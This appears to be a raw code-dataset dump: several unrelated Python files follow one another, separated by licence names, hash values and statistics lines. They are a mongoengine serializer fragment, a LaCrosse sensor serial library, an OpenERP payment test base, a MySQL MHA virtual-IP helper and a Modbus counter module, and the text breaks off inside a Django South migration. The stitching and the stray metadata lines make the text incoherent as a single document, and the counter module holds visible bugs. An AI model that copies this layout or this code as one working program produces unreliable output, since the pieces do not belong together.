mongoengine.BooleanField: fields.BooleanField,
mongoengine.FileField: fields.FileField,
mongoengine.ImageField: fields.ImageField,
mongoengine.ObjectIdField: fields.Field,
mongoengine.ReferenceField: ReferenceField,
mongoengine.ListField: ListField,
mongoengine.EmbeddedDocumentField: EmbeddedDocumentField,
mongoengine.DynamicField: DynamicField,
mongoengine.DecimalField: fields.DecimalField,
mongoengine.LineStringField: fields.CharField,
}
attribute_dict = {
mongoengine.StringField: ['max_length'],
mongoengine.DecimalField: ['min_value', 'max_value'],
mongoengine.EmailField: ['max_length'],
mongoengine.FileField: ['max_length'],
mongoengine.ImageField: ['max_length'],
mongoengine.URLField: ['max_length'],
}
if model_field.__class__ in attribute_dict:
attributes = attribute_dict[model_field.__class__]
for attribute in attributes:
kwargs.update({attribute: getattr(model_field, attribute)})
try:
return field_mapping[model_field.__class__](**kwargs)
except KeyError:
return fields.ModelField(model_field=model_field, **kwargs)
class StreetSerializer(MongoEngineModelSerializer2):
class Meta:
model = Street
depth = 8
class CoteSerializer(MongoEngineModelSerializer2):
class Meta:
model = Cote
exclude = ()
depth = 8
class CotePlanSerializer(MongoEngineModelSerializer2):
class Meta:
model = Cote
exclude = ('id','street','geometry','properties',)
depth = 1
class CoteGeoSerializer(MongoEngineModelSerializer2):
class Meta:
model = Cote
exclude = ('id','street','plan','properties',)
depth = 1
|
gpl-2.0
| -2,298,330,859,549,157,400 | 34.319588 | 143 | 0.770511 | false |
hthiery/python-lacrosse
|
pylacrosse/lacrosse.py
|
1
|
8422
|
# Copyright (c) 2017 Heiko Thiery
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301
# USA
from __future__ import unicode_literals
import logging
import re
import threading
_LOGGER = logging.getLogger(__name__)
"""
Jeelink lacrosse firmware commands
<n>a set to 0 if the blue LED bothers
<n>f initial frequency in kHz (5 kHz steps, 860480 ... 879515) (for RFM
#1)
<n>F initial frequency in kHz (5 kHz steps, 860480 ... 879515) (for RFM
#2)
<n>h altituide above sea level
<n>m bits 1: 17.241 kbps, 2 : 9.579 kbps, 4 : 8.842 kbps (for RFM #1)
<n>M bits 1: 17.241 kbps, 2 : 9.579 kbps, 4 : 8.842 kbps (for RFM #2)
<n>r use one of the possible data rates (for RFM #1)
<n>R use one of the possible data rates (for RFM #2)
<n>t 0=no toggle, else interval in seconds (for RFM #1)
<n>T 0=no toggle, else interval in seconds (for RFM #2)
v show version
<n>y if 1 all received packets will be retransmitted (Relay mode)
"""
class LaCrosse(object):
sensors = {}
_registry = {}
_callback = None
_serial = None
_stopevent = None
_thread = None
def __init__(self, port, baud, timeout=2):
"""Initialize the Lacrosse device."""
self._port = port
self._baud = baud
self._timeout = timeout
self._serial = SerialPortFactory().create_serial_port(port)
self._callback_data = None
def open(self):
"""Open the device."""
self._serial.port = self._port
self._serial.baudrate = self._baud
self._serial.timeout = self._timeout
self._serial.open()
self._serial.flushInput()
self._serial.flushOutput()
def close(self):
"""Close the device."""
self._stop_worker()
self._serial.close()
def start_scan(self):
"""Start scan task in background."""
self._start_worker()
def _write_cmd(self, cmd):
"""Write a cmd."""
self._serial.write(cmd.encode())
@staticmethod
def _parse_info(line):
"""
The output can be:
- [LaCrosseITPlusReader.10.1s (RFM12B f:0 r:17241)]
- [LaCrosseITPlusReader.10.1s (RFM12B f:0 t:10~3)]
"""
re_info = re.compile(
r'\[(?P<name>\w+).(?P<ver>.*) ' +
r'\((?P<rfm1name>\w+) (\w+):(?P<rfm1freq>\d+) ' +
r'(?P<rfm1mode>.*)\)\]')
info = {
'name': None,
'version': None,
'rfm1name': None,
'rfm1frequency': None,
'rfm1datarate': None,
'rfm1toggleinterval': None,
'rfm1togglemask': None,
}
match = re_info.match(line)
if match:
info['name'] = match.group('name')
info['version'] = match.group('ver')
info['rfm1name'] = match.group('rfm1name')
info['rfm1frequency'] = match.group('rfm1freq')
values = match.group('rfm1mode').split(':')
if values[0] == 'r':
info['rfm1datarate'] = values[1]
elif values[0] == 't':
toggle = values[1].split('~')
info['rfm1toggleinterval'] = toggle[0]
info['rfm1togglemask'] = toggle[1]
return info
def get_info(self):
"""Get current configuration info from 'v' command."""
re_info = re.compile(r'\[.*\]')
self._write_cmd('v')
while True:
line = self._serial.readline()
try:
line = line.encode().decode('utf-8')
except AttributeError:
line = line.decode('utf-8')
match = re_info.match(line)
if match:
return self._parse_info(line)
def led_mode_state(self, state):
"""Set the LED mode.
The LED state can be True or False.
"""
self._write_cmd('{}a'.format(int(state)))
def set_frequency(self, frequency, rfm=1):
"""Set frequency in kHz.
The frequency can be set in 5kHz steps.
"""
cmds = {1: 'f', 2: 'F'}
self._write_cmd('{}{}'.format(frequency, cmds[rfm]))
def set_datarate(self, rate, rfm=1):
"""Set datarate (baudrate)."""
cmds = {1: 'r', 2: 'R'}
self._write_cmd('{}{}'.format(rate, cmds[rfm]))
def set_toggle_interval(self, interval, rfm=1):
"""Set the toggle interval."""
cmds = {1: 't', 2: 'T'}
self._write_cmd('{}{}'.format(interval, cmds[rfm]))
def set_toggle_mask(self, mode_mask, rfm=1):
"""Set toggle baudrate mask.
The baudrate mask values are:
1: 17.241 kbps
2 : 9.579 kbps
4 : 8.842 kbps
These values can be or'ed.
"""
cmds = {1: 'm', 2: 'M'}
self._write_cmd('{}{}'.format(mode_mask, cmds[rfm]))
def _start_worker(self):
if self._thread is not None:
return
self._stopevent = threading.Event()
self._thread = threading.Thread(target=self._refresh, args=())
self._thread.daemon = True
self._thread.start()
def _stop_worker(self):
if self._stopevent is not None:
self._stopevent.set()
if self._thread is not None:
self._thread.join()
def _refresh(self):
"""Background refreshing thread."""
while not self._stopevent.isSet():
line = self._serial.readline()
#this is for python2/python3 compatibility. Is there a better way?
try:
line = line.encode().decode('utf-8')
except AttributeError:
line = line.decode('utf-8')
if LaCrosseSensor.re_reading.match(line):
sensor = LaCrosseSensor(line)
self.sensors[sensor.sensorid] = sensor
if self._callback:
self._callback(sensor, self._callback_data)
if sensor.sensorid in self._registry:
for cbs in self._registry[sensor.sensorid]:
cbs[0](sensor, cbs[1])
def register_callback(self, sensorid, callback, user_data=None):
"""Register a callback for the specified sensor id."""
if sensorid not in self._registry:
self._registry[sensorid] = list()
self._registry[sensorid].append((callback, user_data))
def register_all(self, callback, user_data=None):
"""Register a callback for all sensors."""
self._callback = callback
self._callback_data = user_data
class LaCrosseSensor(object):
"""The LaCrosse Sensor class."""
# OK 9 248 1 4 150 106
re_reading = re.compile(r'OK (\d+) (\d+) (\d+) (\d+) (\d+) (\d+)')
def __init__(self, line=None):
if line:
self._parse(line)
def _parse(self, line):
match = self.re_reading.match(line)
if match:
data = [int(c) for c in match.group().split()[1:]]
self.sensorid = data[1]
self.sensortype = data[2] & 0x7f
self.new_battery = True if data[2] & 0x80 else False
self.temperature = float(data[3] * 256 + data[4] - 1000) / 10
self.humidity = data[5] & 0x7f
self.low_battery = True if data[5] & 0x80 else False
def __repr__(self):
return "id=%d t=%f h=%d nbat=%d" % \
(self.sensorid, self.temperature, self.humidity, self.new_battery)
class SerialPortFactory(object):
def create_serial_port(self, port):
if port.startswith("rfc2217://"):
from serial.rfc2217 import Serial
return Serial()
else:
from serial import Serial
return Serial()
|
lgpl-2.1
| 5,584,597,985,003,810,000 | 32.420635 | 80 | 0.553906 | false |
open-synergy/opnsynid-account-payment
|
account_payment_import_no_move_line/tests/base.py
|
1
|
2437
|
# -*- coding: utf-8 -*-
# Copyright 2017 OpenSynergy Indonesia
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from openerp.tests.common import TransactionCase
from datetime import datetime
class BaseTest(TransactionCase):
def setUp(self, *args, **kwargs):
super(BaseTest, self).setUp(*args, **kwargs)
# Objects
self.obj_account_invoice = self.env['account.invoice']
self.obj_account_invoice_line = self.env['account.invoice.line']
self.obj_bank_statement = self.env['account.bank.statement']
self.obj_payment_order = self.env['payment.order']
self.obj_payment_line = self.env['payment.line']
self.obj_payment_mode = self.env['payment.mode']
self.wiz = self.env['account.payment.populate.statement']
self.obj_create_payment = self.env['payment.order.create']
# Data
self.date = datetime.now().strftime("%Y-%m-%d")
self.partner = self.env.ref("base.res_partner_1")
self.product = self.env.ref('product.product_product_5')
self.mode = self.env.ref('account_payment.payment_mode_1')
self.curr = self.env.ref("base.IDR")
self.account = self.env.ref('account.a_recv')
self.journal = self.env.ref('account.bank_journal')
self.invoice = self._create_invoice()
self.payment_order = self._create_payment_order()
self.data_payment = self.env.ref('account_payment.payment_order_1')
def _create_invoice(self):
vals = {
'partner_id': self.partner.id,
'reference_type': 'none',
'currency_id': self.curr.id,
'name': 'invoice to client',
'account_id': self.account.id,
'type': 'out_invoice',
'date_invoice': self.date,
'date_due': self.date
}
invoice_id = self.obj_account_invoice.create(vals)
lines = {
'product_id': self.product.id,
'quantity': 1,
'price_unit': 50000,
'invoice_id': invoice_id.id,
'name': 'Test Invoice'
}
self.obj_account_invoice_line.create(lines)
return invoice_id
def _create_payment_order(self):
vals = {
'reference': 'Test Payment',
'mode': self.mode.id,
'date_prefered': 'now'
}
order_id = self.obj_payment_order.create(vals)
return order_id
|
agpl-3.0
| 2,740,612,655,803,864,600 | 35.924242 | 75 | 0.587608 | false |
grypyrg/mha-helper
|
mha_helper/vip_metal_helper.py
|
1
|
4494
|
# (c) 2015, Ovais Tariq <me@ovaistariq.net>
#
# This file is part of mha_helper
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
from ssh_helper import SSHHelper
from config_helper import ConfigHelper
import re
class VIPMetalHelper(object):
IP_CMD = "/sbin/ip"
ARPING_CMD = "/usr/sbin/arping"
def __init__(self, host, host_ip=None, ssh_user=None, ssh_port=None, ssh_options=None):
config_helper = ConfigHelper(host)
self._cluster_interface = config_helper.get_cluster_interface()
self._writer_vip_cidr = config_helper.get_writer_vip_cidr()
self._writer_vip = config_helper.get_writer_vip()
self._requires_sudo = config_helper.get_requires_sudo()
self._requires_arping = config_helper.get_requires_arping()
self._ssh_client = SSHHelper(host, host_ip, ssh_user, ssh_port, ssh_options)
def assign_vip(self):
ip_cmd = "%s addr add %s dev %s" % (VIPMetalHelper.IP_CMD, self._writer_vip_cidr, self._cluster_interface)
arping_cmd = "%s -q -c 3 -A -I %s %s" % (VIPMetalHelper.ARPING_CMD, self._cluster_interface, self._writer_vip)
if self._requires_sudo:
ip_cmd = "sudo %s" % ip_cmd
arping_cmd = "sudo %s" % arping_cmd
# Connect to the host over SSH
if not self._ssh_client.make_ssh_connection():
return False
# Assign the VIP to the host
ret_code, stdout_lines = self._ssh_client.execute_ssh_command(ip_cmd)
if not ret_code:
if len(stdout_lines) > 0:
print("Command output: %s" % "\n".join(stdout_lines))
return False
# Send ARP update requests to all the listening hosts
if self._requires_arping:
ret_code, stdout_lines = self._ssh_client.execute_ssh_command(arping_cmd)
if not ret_code:
if len(stdout_lines) > 0:
print("Command output: %s" % "\n".join(stdout_lines))
return False
return True
def remove_vip(self):
ip_cmd = "%s addr delete %s dev %s" % (VIPMetalHelper.IP_CMD, self._writer_vip_cidr, self._cluster_interface)
if self._requires_sudo:
ip_cmd = "sudo %s" % ip_cmd
# Connect to the host over SSH
if not self._ssh_client.make_ssh_connection():
return False
# Remove the VIP from the host
ret_code, stdout_lines = self._ssh_client.execute_ssh_command(ip_cmd)
if not ret_code:
if len(stdout_lines) > 0:
print("Command output: %s" % "\n".join(stdout_lines))
return False
return True
def has_vip(self):
ip_cmd = "%s addr show dev %s" % (VIPMetalHelper.IP_CMD, self._cluster_interface)
if self._requires_sudo:
ip_cmd = "sudo %s" % ip_cmd
# Connect to the host over SSH
if not self._ssh_client.make_ssh_connection():
return False
# Fetch the output of the command `ip addr show dev eth` and parse it to list the IP addresses
# If the VIP is in that list then that means the VIP is assigned to the host
ret_code, stdout_lines = self._ssh_client.execute_ssh_command(ip_cmd)
if not ret_code:
if len(stdout_lines) > 0:
print("Command output: %s" % "\n".join(stdout_lines))
return False
vip_found = False
for line in stdout_lines:
# We want to match a line similar to the following:
# inet 192.168.30.11/24 brd 192.168.30.255 scope global eth1
if re.search(r'\b(inet|inet6)\b', line):
# The second element of the matching line is the IP address in CIDR format
if line.split()[1] == self._writer_vip_cidr:
vip_found = True
break
return vip_found
|
gpl-3.0
| -1,085,869,760,472,651,600 | 39.125 | 118 | 0.613262 | false |
dcneeme/droidcontroller
|
cchannels.py
|
1
|
20840
|
# to be imported to access modbus registers as counters
# 04.04.2014 OOP
# 05.04.2014 OOP
# 06.04.2014 counter grousp with sequential regadd range, optimized read done
# 15.04.2014 added ask_counters()
from sqlgeneral import * # SQLgeneral / vaja ka time,mb, conn jne
s=SQLgeneral() # init sisse?
from counter2power import * # Counter2Power() handles power calculation based on pulse count increments
class Cchannels(SQLgeneral): # handles counters registers and tables
''' Access to io by modbus analogue register addresses (and also via services?).
Modbus client must be opened before.
Able to sync input and output channels and accept changes to service members by their sta_reg code
'''
def __init__(self, in_sql = 'counters.sql', readperiod = 10, sendperiod = 30):
self.setReadPeriod(readperiod)
self.setSendPeriod(sendperiod)
self.in_sql = in_sql.split('.')[0]
self.s = SQLgeneral()
self.cp=[] # possible counter2value calculation instances
self.Initialize()
def setReadPeriod(self, invar):
''' Set the refresh period, executes sync if time from last read was earlier than period ago '''
self.readperiod = invar
def setSendPeriod(self, invar):
''' Set the refresh period, executes sync if time from last read was earlier than period ago '''
self.sendperiod = invar
def sqlread(self, table):
self.s.sqlread(table) # read dichannels
def Initialize(self): # before using this create s=SQLgeneral()
''' initialize delta t variables, create tables and modbus connection '''
self.ts = round(time.time(),1)
self.ts_read = self.ts # time of last read
self.ts_send = self.ts -10 # time of last reporting
self.sqlread(self.in_sql) # read counters table
self.ask_counters() # ask server about the last known values of the counter related services
def ask_counters(self): # use on init, send ? to server
''' Queries last counter service values from the server '''
Cmd="select val_reg from "+self.in_sql+" group by val_reg" # process and report by services
#print "Cmd=",Cmd
cur=conn.cursor()
cur.execute(Cmd) # getting services to be read and reported
for row in cur: # possibly multivalue service members
val_reg=row[0]
udp.udpsend(val_reg+':?\n') # wo status to uniscada server
conn.commit()
return 0
def restore_counter(self,register): # one at the time
''' decode values from server for set_counter(). some values are counted, but some may be setup values! '''
#FIXME!
return 0
def set_counter(self, value = 0, **kwargs): # mba,regadd,val_reg,member # one counter to be set. check wcount from counters table
''' sets ONE counter value, any wordlen (number of registers,must be defined in counters.sql) '''
#val_reg='' # arguments to use a subset of them
#member=0
#mba=0
#regadd=0
#wcount=0
value=(int(value)&0xFFFFFFFF) # to make sure the value to write is 32 bit integer
cur=conn.cursor()
try:
mba=kwargs['mba']
regadd=kwargs['regadd']
Cmd="select val_reg,member,mba,regadd,wcount,x2,y2 from counters where mba='"+str(mba)+"' and regadd='"+str(regadd)+"' and mbi="+str(mbi)
#print(Cmd) # debug
except:
try:
kwargs.get('val_reg','C1V')
kwargs.get('member',1)
except:
print('invalid parameters for set_counter()')
return 2
try:
cur.execute(Cmd)
for srow in cur:
val_reg=srow[0]
member=int(srow[1]) # replaces if missing
mba=int(srow[2]) # replaces if missing
regadd=int(srow[3])
wcount=int(srow[4])
# x2 y2 for autoscale (5,6)
if wcount == 2: # normal counter
mb[mbi].write(mba,regadd,count=2, values=[value&4294901760,value&65535]) #
return 0
else:
if wcount == -2: # barionet counter, MSW must be written first
mb[mbi].write(mba,address=regadd, count=2,values=[value&65535, value&4294901760])
return 0
else:
print('unsupported counter configuration!',mba,regadd,wcount)
return 1
except: # set failed
msg='failed restoring counter register '+str(mba)+'.'+str(regadd)
#syslog(msg)
print(msg)
traceback.print_exc()
return 1
def read_counter_grp(self,mba,regadd,count,wcount,mbi=0): # using self,in_sql as the table to store in.
''' Read sequential register group, process numbers according to counter size and store raw into table self.in_sql. Inside transaction! '''
step=abs(wcount)
if step == 0:
print('illegal wcount',wcount,'in read_counter_grp()')
return 2
msg='reading data for counter group from mba '+str(mba)+', regadd '+str(regadd)+', count '+str(count)+', wcount '+str(wcount)+', mbi '+str(mbi)
#print(msg) # debug
if count>0 and mba<>0 and wcount<>0:
result = mb[mbi].read(mba, regadd, count=count, type='h') # client.read_holding_registers(address=regadd, count=1, unit=mba)
msg=msg+', result: '+str(result)
print(msg) # debug
else:
print('invalid parameters for read_counter_grp()!',mba,regadd,count,wcount,mbi)
return 2
if result != None:
try:
for i in range(count/step): # tuple to table rows. tuple len is twice count!
tcpdata=0
if wcount == 2:
tcpdata = 65536*result[step*i]+result[step*i+1]
#print('normal counter',str(i),'result',tcpdata) # debug
elif wcount == -2:
tcpdata = 65536*result[step*i+1]+result[step*i] # wrong word order for counters in barionet!
#print('barionet counter',str(i),'result',tcpdata) # debug
else: # something else
print('unsupported counter word size',wcount)
return 1
Cmd="UPDATE "+self.in_sql+" set raw='"+str(tcpdata)+"', ts='"+str(self.ts)+"' where mba='"+str(mba)+"' and regadd='"+str(regadd+i*step)+"'" # koigile korraga
#print('i',i,Cmd) # debug
conn.execute(Cmd)
return 0
except:
traceback.print_exc()
return 1
else:
msg='counter data processing FAILED for mbi,mba,regadd,count '+str(mbi)+', '+str(mba)+', '+str(regadd)+', '+str(count)
print(msg)
return 1
def read_counters(self): # read all defined counters, usually 32 bit / 2 registers.
''' Must read the counter registers by sequential regadd blocks if possible (if regadd increment == wcount.
Also converts the raw data (incl member rows wo mba) into services and sends away to UDPchannel.
'''
respcode=0
mba=0
val_reg=''
sta_reg=''
status=0
value=0
lisa=''
desc=''
comment=''
#mcount=0
Cmd1=''
self.ts = round(time.time(),1)
ts_created=self.ts # selle loeme teenuse ajamargiks
cur=conn.cursor()
cur3=conn.cursor()
bmba=0 # mba for sequential register address block
bfirst=0 # sequential register block start
blast=0
wcount=0
bwcount=0
bcount=0
tcpdata=0
sent=0
try:
Cmd="BEGIN IMMEDIATE TRANSACTION" # conn3
conn.execute(Cmd)
Cmd="select mba,regadd,wcount,mbi from "+self.in_sql+" where mba<>'' and regadd<>'' group by mbi,mba,regadd" # tsykkel lugemiseks, tuleks regadd kasvavasse jrk grupeerida
cur.execute(Cmd) # selle paringu alusel raw update, hiljem teha value arvutused iga teenuseliikme jaoks eraldi
for row in cur: # these groups can be interrupted into pieces to be queried!
mba=int(row[0]) if int(row[0]) != '' else 0
regadd=int(row[1]) if int(row[0]) != '' else 0
wcount=int(row[2]) if int(row[0]) != '' else 0 # wordcount for the whole group
mbi=int(row[3]) if int(row[0]) != '' else 0 # modbus connection indexed
#print 'found counter mbi,mba,regadd,wcount',mbi,mba,regadd,wcount # debug
if bfirst == 0:
bfirst = regadd
blast = regadd
bwcount = wcount # wcount can change with next group
bcount=abs(wcount) # word count is the count
bmba=mba
bmbi=mbi
#print('counter group mba '+str(bmba)+' start ',bfirst) # debug
else: # not the first
if mbi == bmbi and mba == bmba and regadd == blast+abs(wcount): # sequential group still growing
blast = regadd
bcount=bcount+abs(wcount) # increment by word size
#print('counter group end shifted to',blast) # debug
else: # a new group started, make a query for previous
#print('counter group end detected at regadd',blast,'bcount',bcount) # debugb
#print('going to read counter registers from',bmba,bfirst,'to',blast,'regcount',bcount) # debug
self.read_counter_grp(bmba,bfirst,bcount,bwcount,bmbi) # reads and updates table with previous data
bfirst = regadd # new grp starts immediately
blast = regadd
#bwcount = wcount # does not change inside group
bcount=abs(wcount) # new read piece started
bwcount=wcount
bmba=mba
bmbi=mbi
#print('counter group mba '+str(bmba)+' start ',bfirst) # debug
if bfirst != 0: # last group yet unread
#print('counter group end detected at regadd',blast) # debug
#print('going to read counter registers from',bmba,bfirst,'to',blast,'regcount',bcount) # debug
self.read_counter_grp(bmba,bfirst,bcount,bwcount,bmbi) # reads and updates table
# raw sync done.
# now process raw -> value and find status BY SERVICES. service loop begins.
#power calcultions happens below too, for each service , not for each counter!
Cmd="select val_reg from "+self.in_sql+" group by val_reg" # process and report by services
#print "Cmd=",Cmd
cur.execute(Cmd) # getting services to be read and reported
cpi=-1 # counter2power instance index, increase only if with cfg weight 64 true
for row in cur: # possibly multivalue service members
lisa='' # string to put space-separated values in
val_reg=''
sta_reg=''
status=0 #
value=0
val_reg=row[0] # service value register name
sta_reg=val_reg[:-1]+"S" # status register name
#print 'reading counter values for val_reg',val_reg,'with',mcount,'members' # temporary
Cmd3="select * from "+self.in_sql+" where val_reg='"+val_reg+"' order by member asc" # chk all members, also virtual!
#print Cmd3 # debug
cur3.execute(Cmd3)
for srow in cur3: # members for one counter svc
#print srow # debug
mba=0 # local here
regadd=0
member=0
cfg=0
x1=0
x2=0
y1=0
y2=0
outlo=0
outhi=0
ostatus=0 # eelmine
#tvalue=0 # test
raw=0 # unconverted reading
#oraw=0 # previous unconverted reading
ovalue=0 # previous converted value
value=0 # latest (converted) value
ots=0
avg=0 # averaging strength, effective from 2
desc='' # description for UI
comment='' # comment internal
result=[]
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
#mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment # counters
mba=int(srow[0]) if srow[0] != '' else 0 # modbus address
regadd=int(srow[1]) if srow[1] != '' else 0 # must be int! can be missing
val_reg=srow[2] # string
member=int(srow[3]) if srow[3] != '' else 0
cfg=int(srow[4]) if srow[4] != '' else 0 # config byte
x1=int(srow[5]) if srow[5] != '' else 0
x2=int(srow[6]) if srow[6] != '' else 0
y1=int(srow[7]) if srow[7] != '' else 0
y2=int(srow[8]) if srow[8] != '' else 0
outlo=int(srow[9]) if srow[9] != '' else 0
outhi=int(srow[10]) if srow[10] != '' else 0
avg=int(srow[11]) if srow[11] != '' else 0 # averaging strength, effective from 2
#if srow[12] != '': # block
# block=int(srow[12]) # block / error count
# updated before raw reading
raw=int(srow[13]) if srow[13] != '' else 0
# previous converted value
ovalue=eval(srow[14]) if srow[14] != '' else 0 # not updated above!
ostatus=int(srow[15]) if srow[15] != '' else 0
ots=eval(srow[16]) if srow[16] != '' else self.ts
#desc=srow[17]
#comment=srow[18]
#wcount=srow[19] # word count
#print('got from '+self.in_sql+' raw,ovalue',raw,ovalue) # debug
if lisa != '':
lisa=lisa+" "
# CONFIG BYTE BIT MEANINGS
# 1 - below outlo warning,
# 2 - below outlo critical,
# NB! 3 - not to be sent if value below outlo
# 4 - above outhi warning
# 8 - above outhi critical
# 16 - to be zeroed regularly, see next bits for when NOT IN USE! done by server
# 32 - midnight if 1, month change if 0 NOT IN USE
# 64 - power to be counted based on count increase and time period between counts
# 128 - OFF-state not used in lolimit, OFF is equal to in-range??
if x1 != x2 and y1 != y2: # seems like normal input data
value=(raw-x1)*(y2-y1)/(x2-x1)
value=int(y1+value) # integer values to be reported only
else:
print("read_counters val_reg",val_reg,"member",member,"ai2scale PARAMETERS INVALID:",x1,x2,'->',y1,y2,'conversion not used!')
# jaab selline value nagu oli
if avg>1 and abs(value-ovalue)<value/2: # averaging the readings. big jumps (more than 50% change) are not averaged.
value=int(((avg-1)*ovalue+value)/avg) # averaging with the previous value, works like RC low pass filter
#print('counter avg on, value became ',value) # debug
# print('end processing counter',val_reg,'member',member,'raw',raw,' value',value,' ovalue',ovalue,', avg',avg) # debug
#POWER?
if (cfg&64): # power, increment to be calculated! divide increment to time from the last reading to get the power
cpi=cpi+1 # counter2power index
try:
if self.cp[cpi]:
pass # instance already exists
except:
self.cp.append(Counter2Power(val_reg,member,outlo,outhi)) # another Count2Power instance
print('Counter2Power() instance cp['+str(cpi)+'] created')
res=self.cp[cpi].calc(ots,value) # power calculation based on counter increase
value=res[0]
print('got result from cp['+str(cpi)+']: '+str(res)) # debug
else: # normal counter
if value == 0 and ovalue >0: # possible pic reset. perhaps value <= 100?
msg='restoring lost content for counter '+str(mba)+'.'+str(regadd)+':2 to become '+str(ovalue)+' again instead of '+str(value)
#syslog(msg)
print(msg)
value=ovalue # +value # restoring based on ovalue and new count
self.set_counter(value,mba,regadd)
Cmd="update "+self.in_sql+" set value='"+str(value)+"' where val_reg='"+val_reg+"' and member='"+str(member)+"'"
conn.execute(Cmd) # new value set in sql table
# STATUS SET. check limits and set statuses based on that
# returning to normal with hysteresis, take previous value into account
status=0 # initially for each member
if value>outhi: # yle ylemise piiri
if (cfg&4) and status == 0: # warning if above the limit
status=1
if (cfg&8) and status<2: # critical if above the limit
status=2
if (cfg&12) == 12: # unknown if above the limit
status=3
else: # return to normal with hysteresis
if value<outhi-0.05*(outhi-outlo):
status=0 # normal again
if value<outlo: # below lo limit
if (cfg&1) and status == 0: # warning if below lo limit
status=1
if (cfg&2) and status<2: # warning if below lo limit
status=2
if (cfg&3) == 3: # unknown if below lo limit
status=3
else: # return
if value>outlo+0.05*(outhi-outlo):
status=0 # normal again
#print('status for counter svc',val_reg,status,'due to cfg',cfg,'and value',value,'while limits are',outlo,outhi) # debug
#if value<ovalue and ovalue < 4294967040: # this will restore the count increase during comm break
lisa=lisa+str(value) # members together into one string
# sending service to buffer
if self.ts - self.ts_send>self.sendperiod:
sent=1
sendtuple=[sta_reg,status,val_reg,lisa]
#print('counter svc - going to report',sendtuple) # debug
udp.send(sendtuple) # to uniscada instance
if sent == 1:
self.ts_send = self.ts
sent = 0
conn.commit() # counters transaction end
return 0
except: # end reading counters
msg='problem with counters read or processing: '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
traceback.print_exc()
sys.stdout.flush()
time.sleep(1)
return 1
#read_counters end #############
def doall(self): # do this regularly, executes only if time is is right
''' Reads and possibly reports counters on time if executed regularly '''
self.ts = round(time.time(),1)
if self.ts - self.ts_read>self.readperiod:
self.ts_read = self.ts
self.read_counters() # also includes ts_sent test and reporting
return 0
|
gpl-3.0
| -895,499,548,288,928,400 | 47.240741 | 182 | 0.517658 | false |
ramusus/django-facebook-ads
|
facebook_ads/migrations/0014_auto__add_field_adstatistic_reach__add_field_adstatistic_frequency__ad.py
|
1
|
14442
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'AdStatistic.reach'
db.add_column('facebook_ads_adstatistic', 'reach', self.gf('django.db.models.fields.IntegerField')(null=True), keep_default=False)
# Adding field 'AdStatistic.frequency'
db.add_column('facebook_ads_adstatistic', 'frequency', self.gf('django.db.models.fields.FloatField')(null=True), keep_default=False)
# Adding field 'AdStatistic.unique_ctr'
db.add_column('facebook_ads_adstatistic', 'unique_ctr', self.gf('django.db.models.fields.FloatField')(default=0), keep_default=False)
# Changing field 'AdStatistic.social_reach'
db.alter_column('facebook_ads_adstatistic', 'social_reach', self.gf('django.db.models.fields.IntegerField')(null=True))
def backwards(self, orm):
# Deleting field 'AdStatistic.reach'
db.delete_column('facebook_ads_adstatistic', 'reach')
# Deleting field 'AdStatistic.frequency'
db.delete_column('facebook_ads_adstatistic', 'frequency')
# Deleting field 'AdStatistic.unique_ctr'
db.delete_column('facebook_ads_adstatistic', 'unique_ctr')
# Changing field 'AdStatistic.social_reach'
db.alter_column('facebook_ads_adstatistic', 'social_reach', self.gf('django.db.models.fields.IntegerField')(default=0))
models = {
'facebook_ads.adaccount': {
'Meta': {'ordering': "['account_id']", 'object_name': 'AdAccount'},
'account_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'account_status': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'business_city': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_country_code': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_state': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_street': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_street2': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_zip': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'currency': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'daily_spend_limit': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_personal': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'timezone_id': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'timezone_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'vat_status': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'facebook_ads.adcampaign': {
'Meta': {'ordering': "['name']", 'object_name': 'AdCampaign'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adcampaigns'", 'to': "orm['facebook_ads.AdAccount']"}),
'campaign_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'campaign_status': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'daily_budget': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'daily_imps': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
